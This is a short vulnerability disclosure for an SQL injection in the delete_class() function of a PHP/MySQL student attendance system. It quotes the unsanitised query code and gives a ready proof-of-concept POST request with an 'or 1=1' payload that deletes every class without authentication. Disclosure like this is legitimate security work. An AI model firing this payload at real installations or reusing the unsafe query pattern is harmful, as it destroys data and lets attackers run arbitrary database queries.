Credits:
Reigz Macolor (https://github.com/reigz/)
Tested On:
Affected Version:
Simple Student Attendance System using PHP and MySQL 1.0
Affected Site Page:
/ajax-api.php
Affected Code:
</ajax-api.php [function delete_class()]>
public function delete_class(){
extract($_POST);
$delete = $this->conn->query("DELETE FROM `class_tbl` where `id` = '{$id}'");
if($delete){
$_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Class has been deleted successfully!" ];
return [ "status" => "success" ];
}else{
$_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Class has failed to deleted due to unknown reason!" ];
return [ "status" => "error", "Class has failed to deleted!" ];
}
}
Related CWE:
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Allows SQL Injection by placing untrusted code executing a query on the backend, for the POC all classes are deleted without any authentication
POST /ajax-api.php?action=delete_class HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 19
Connection: close
id=1337'+or+1=1;--+
DELETES all classes without authentication.
As an attacker, can do the following:
- Run any database query and have same permission as the web application (default for this Web Application is root).